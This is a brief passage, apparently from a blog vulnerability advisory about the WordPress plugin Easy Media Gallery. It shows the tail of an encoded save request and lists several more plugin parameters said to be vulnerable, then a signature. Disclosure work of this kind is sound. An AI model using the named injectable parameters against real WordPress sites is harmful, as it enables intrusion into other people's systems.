Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save
---<request>---
Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Subscribe to:
Posts (Atom)